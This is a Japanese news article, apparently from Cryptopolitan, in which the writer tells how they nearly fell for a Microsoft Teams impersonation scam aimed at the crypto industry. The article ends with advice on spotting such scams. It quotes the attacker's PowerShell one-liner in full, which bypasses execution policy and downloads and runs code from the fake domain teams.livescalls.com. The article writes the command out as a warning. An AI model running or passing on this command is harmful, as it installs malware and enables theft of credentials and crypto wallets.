tradingkey.logo

tradingkey.logo
怜玢


Microsoft Teamsの通話䞭にハッキングされそうになった — 詐欺の手口はこうだ

CryptopolitanMar 1, 2026 9:48 AM
facebooktwitterlinkedin
すべおのコメントを芋る0


今日早朝、Microsoft Teams の通話ずいう、ごく日垞的で䞀芋無害なものを悪甚するために蚭蚈された手の蟌んだ゜ヌシャル ゚ンゞニアリングの蚈画の犠牲者になるずころだった経緯をお話ししたしょう。. 

やり取りの倧郚分においお、異垞なこずは䜕も起きたせんでした。. 

業界の連絡先だず思っおいた人が私に連絡しおきお、Microsoft Teams で䌚議を蚭定するよう頌んできたので、協力者になりたいずいう私の心は喜んで電話に出おいきたした。. 

ネタバレ泚意: 電話の盞手はなりすたしで、私のコンピュヌタヌで悪意のあるコヌドを実行させようずしたした。. 

私は、暗号通貚や Web3 コミュニティの友人、知人、同䞖代の人々ぞの泚意喚起ずしお、ここでこの経隓党䜓を詳しく話したす。. 

今日はほずんど私だったが、明日は別の誰かになるかもしれない。. 

ステップ1セットアップ - 「昔の友達ず電話で近況を話そう」 

有名な暗号通貚 PR 代理店のトップ瀟員ずしお知っおいる人の Telegram アカりントからテキストを受け取ったずき、フィッシング詐欺に巻き蟌たれるなんお考えも及ばないはずです。. 

兞型的な危険信号もすぐには珟れたせんでした。. 

これはランダムなDMではありたせんでした。. 

私が話しおいたのは、「i」が埮劙に「l」に眮き換えられおいるなりすたしアカりントではありたせん。 

実際、私もそのアカりントでチャット履歎があったので、盞手は本物の人間だず思っおいたした。. 

再䌚を祝っお、すっかり友奜的な䌚話を始めた時から、䜕の違和感も感じられなかった。ほどなくしお、30分のミヌティングを予玄するためのCalendlyのリンクず、Microsoft Teamsの通話ぞの招埅が届いた。.

先ほども申し䞊げたように、やり取りを通しお私のレヌダヌは䞀床も倖れるこずはありたせんでした。䞀流PR䌚瀟の幹郚瀟員に期埅されるのず同じレベルのプロ意識ず忍耐力を感じたした。. 

私が知っおいたのは、業界の連絡先の Calendly ペヌゞから Teams 䌚議をスケゞュヌルしたずいうこずだけでした。.

詐欺垫はハッキングされたアカりントを䜿甚しお連絡を取り、Teams 䌚議リンクを送信したす。.

ステップ2「デスクトップ版のみ参加」の眠 

䌚議の日がやっおきたした。これたで少なくずも1000回はやっおきたように、スマヌトフォンでTeams䌚議リンクをクリックしたした。しかし、い぀ものようにすぐに䌚議に参加できたせんでした。通話にリダむレクトされる代わりに、「䞻催者の蚭定により、モバむルデバむスからのこの䌚議ぞのアクセスは蚱可されおいたせん」ずいう画面が衚瀺されたした。 

「やばいこんなこず今たで䞀床もなかったのに。」 

たあ、それはdent でもなかったんです。. 

埌から考えおみるず、それがおそらく最初の本圓の危険信号だったのでしょう。. 

゚ラヌ画面はデザむンの䞀郚です。詐欺垫は、悪意のあるペむロヌドがPCでのみ実行されるコマンドラむンスクリプトであるため、デスクトップたたはラップトップを䜿甚しおいるこずを必芁ずしおいたす。.

ブラりザの URL「 teams.livescalls.com」は実際の Microsoft ドメむンではありたせん。

正芏の Teams 䌚議では、 teams.microsoft.comたたはteams.live.com が䜿甚されたす。 

「livescalls.com」ドメむンは、遠くから芋るず本物ずよく䌌おいたすが、よく芋るず本物ずはかけ離れおいたす。. 

1぀はMicrosoftが管理するサむトで、1日あたり3億2000䞇人以䞊のアクティブナヌザヌを擁しおいるず䞻匵しおいたす。もう1぀は、攻撃者が管理する完党に停のサむトです。. 

公平を期すために蚀うず、䞀郚の組織ではチヌムミヌティングにカスタムドメむンを䜿甚しおいるかもしれたせん。しかし、䞖界経枈フォヌラムによるず、2025幎には詐欺垫に1兆ドル以䞊の資金が倱われるずのこずです。これは、私にずっおスパむダヌセンスを無芖できない十分な理由です。. 

停の「チヌムアクセス通知」ペヌゞはモバむルアクセスをブロックし、悪意のあるスクリプトが実行される可胜性のあるデスクトップ環境の䜿甚を匷制したす。URLはteams.livescalls.comです。Microsoftドメむンではありたせん。.

詐欺垫は、「パヌトナヌが埅っおいたす」ず䞻匵しお、モバむルがブロックされた埌にデスクトップで参加するように被害者に圧力をかけたす。

ステップ3: ペむロヌド - 「TeamsFx SDKを曎新する」

デスクトップ版のTeams䌚議では、Microsoftの公匏ドキュメントに茉っおいるような、プロがデザむンしたペヌゞが衚瀺されたした。TeamsFx SDKが2025幎9月たでに廃止されるずいうMicrosoftの公匏な説明も含たれおいたした。. 

解決策は コヌド ブロックをコピヌしお、タヌミナルたたはコマンド プロンプトで実行したす。.

Googleで怜玢すれば、䌌たようなSDKが存圚するこずが分かりたす。ただ、今回のチヌムの䌚議では必芁ありたせん。. 

このコヌドは䞀芋無害に芋えたす。TeamsFx_API_KEYやMS_Teams_API_SECRETずいった、いかにも公匏っぜい名前の環境倉数を蚭定しおいるからです。しかし、真の攻撃ベクトルは䞭間のどこかに挟たれおおり、攻撃者はあなたが問題に気づくこずを期埅しおいたせん。

powershell -ep bypass -c “(iwr -Uri https://teams.livescalls.com/developer/sdk/update/version/085697307 -UserAgent 'teamsdk' -UseBasicParsing).Content | iex”

この 1 行は PowerShell セキュリティ ポリシヌをバむパスし (-ep bypass)、攻撃者のサヌバヌからコヌドをダりンロヌドしお、すぐに実行したす (iex = Invoke-Expression)。. 

そしお、攻撃者がホストしおいるマルりェア、キヌロガヌ、たたはリモヌト アクセス ツヌルが、デバむスに静かにむンストヌルされたす。.

停のTeams䌚議むンタヌフェヌス。参加者に悪意のある「TeamsFx SDKアップデヌト」ペヌゞが衚瀺されおいたす。通話に参加しおいる参加者はAI生成の動画です。.

ステップ4「心配しないで、安党だから」ずいうプレッシャヌ段階

私がスクリプトを実行するこずに躊躇しおいるず䌝えるず、詐欺垫はすぐに安心させる蚀葉ずプレッシャヌをかけおきたした。. 

「心配しないでください。ずおも簡単で安党です」ずいう行は、PC でコマンド プロンプトを開く方法を瀺すスクリヌンショットの指瀺に簡単に埓うようにするためのものでした。. 

「パヌトナヌはすでに Zoom に参加しおいたす」ずいうメッセヌゞは、簡単なコマンド プロンプトの実行方法がわからないために、党員にプラットフォヌムを切り替えさせなくお枈むずいうプレッシャヌを感じさせるはずでした。.

安心もしたせんでしたし、プレッシャヌも感じたせんでした。.

通話をGoogle Meetに切り替えるこずを提案したのですが、圌らは拒吊したした。どうやら、圌らの詐欺は停のTeams蚭定を通しおのみ機胜するようです。.

詐欺垫は、悪意のあるコヌドを実行するための手順を段階的に送信し、「心配しないでください。非垞に簡単で安党です」ず被害者を安心させたす。

ステップ5: ブラフコヌル — ブロックされ削陀される

スクリプトずドメむンをチェックした埌、私は自分の疑いを確認したした。私は゜ヌシャル ゚ンゞニアリングの暙的ずなり、あず数歩で䞖界経枈フォヌラムの 2026 幎統蚈の䞀郚に加わるずころでした。. 

私は詐欺垫に盎接こう蚀いたした。「確認したずころ、このコマンドずりェブサむトは正芏のものではありたせん。残念ながら、私にはできたせん」。もしただチャットを続けたいのであれば、Google Meetで䌚話を続けるこずを提案したした。.

「しかし、䌚議は珟圚進行䞭です」ずいうのが盞手からのメッセヌゞでした。. 

予想通り、圌らの返答は、䌚議ぞの参加がいかに緊急であるかを私に気づかせるものでした。結局のずころ、パヌトナヌの皆様をあたり長く埅たせたくなかったのです。.

しばらくしお、圌らは私たちのやり取りをすべお削陀し、私をブロックしたした。. 

ああ それはただの危険信号じゃない。深玅の色合いだね。. 

ビゞネス䞊の連絡先は、゜フトりェアの曎新に぀いお質問した瞬間に䌚話履歎党䜓を削陀したり、ブロックしたりするこずはありたせん。.

詐欺だず刀明した埌、攻撃者は䌚議が「珟圚進行䞭」であるず䞻匵し、すべおのメッセヌゞを削陀しお被害者をブロックしたす。.

自分を守る方法

この皮の攻撃は、暗号通貚、Web3、そしおテクノロゞヌ業界党䜓で急増しおいたす。詐欺垫は、PR担圓者、投資家、プロゞェクトリヌダヌの実圚するアカりントを乗っ取ったり、なりすたし、高䟡倀な個人を狙っおいたす。安党を確保するための方法をご玹介したす。

  • 䌚議ペヌゞからコマンドを実行しないでください。正芏のビデオ通話プラットフォヌムでは、タヌミナルやコマンドプロンプトにコヌドを貌り付けるように芁求するこずはありたせん。
  • URLを確認しおください。実際のMicrosoft Teams䌚議は、teams.microsoft.comたたはteams.live.comでラむブ配信されたす。「teams.livescalls.com」などの類䌌ドメむンではありたせん。
  • 「デスクトップのみ」ずいう芁件には泚意が必芁です。䌚議でモバむルアクセスがブロックされおいる堎合、それはスクリプトを実行できるマシンに誘導するための意図的な策略です。
  • 別のチャネルで盞手を確認しおください。既知の連絡先から通垞ずは異なる䌚議リンクが送られおきた堎合は、盎接電話をかけるか、別のプラットフォヌムでメッセヌゞを送信しお確認しおください。
  • 「powershell -ep bypass」ず「iex」に泚意しおください。これらは、あらゆるスクリプトにおいお最も危険な2぀の兆候です。前者はセキュリティを無効にし、埌者はダりンロヌドしたコヌドを盲目的に実行したす。
  • 既にスクリプトを実行枈みの堎合盎ちにむンタヌネットから切断しおください。マルりェアの完党スキャンMalwarebytes、Windows Defender Offlineを実行しおください。別のクリヌンなデバむスですべおのパスワヌドを倉曎しおください。暗号通貚りォレットず銀行口座で䞍正な取匕がないか監芖しおください。

これが暗号通貚ずWeb3にずっおなぜ重芁なのか

これは、攻撃者が広範囲に網を匵り巡らせお䜕を匕っ掛けるかを狙う、兞型的なフィッシング行為ずは蚀えたせん。. 

いいえ、これは暙的を絞った、数日間にわたる゜ヌシャル゚ンゞニアリング䜜戊でした。攻撃者は数日間、業界の同僚に扮しお芪密な関係を築き、Microsoftの停ペヌゞを䜿っおTeamsの通話䞭に技術的な問題の解決方法をさりげなく案内しようずしたした。. 

dent情報を盗む堎合でも、暗号通貚りォレットを空にする堎合でも、氞続的なリモヌト アクセス マルりェアをむンストヌルする堎合でも、攻撃者には埗るものはすべおあり、倱うものは䜕もありたせん。. 

創業者、投資家、あるいは暗号通貚やテクノロゞヌ業界で䌚議に出垭する方は、この蚘事をチヌムメンバヌず共有しおください。こうした詐欺を実行する者たちはたすたす巧劙化しおおり、唯䞀の防埡策は意識を高めるこずです。.

免責事項本サむトで提䟛する情報は教育・情報提䟛を目的ずしたものであり、金融・投資アドバむスずしお解釈されるべきではありたせん。

コメント (0)

$ボタンをクリックし、シンボルを入力しお、株匏、ETF、たたはその他のティッカヌシンボルをリンクしたす。

0/500
コメントガむドラむン
読み蟌み䞭...

おすすめ蚘事

tradingkey.logo
リスク告知圓瀟りェブサむト及びモバむルアプリは特定の投資商品に関する䞀般的な情報のみを提䟛しおおり、Finsightsは金融アドバむスや投資商品の掚奚を行うものではありたせん。本情報の提䟛をもっおFinsightsが投資助蚀を行っおいるず解釈されるこずはありたせん。
投資商品には元本割れを含む重倧なリスクが䌎い、党おの投資家に適するものではありたせん。なお、過去の運甚実瞟は将来の成果を保蚌するものではありたせん。
Finsightsは、第䞉者広告䞻たたは提携先が圓瀟りェブサむト・モバむルアプリ䞊に広告を掲茉するこずを蚱可する堎合があり、これら広告䞻から広告ぞの反応に基づく報酬を受けるこずがありたす。
© 著䜜暩: FINSIGHTS MEDIA PTE. LTD. 無断耇写・転茉を犁じたす。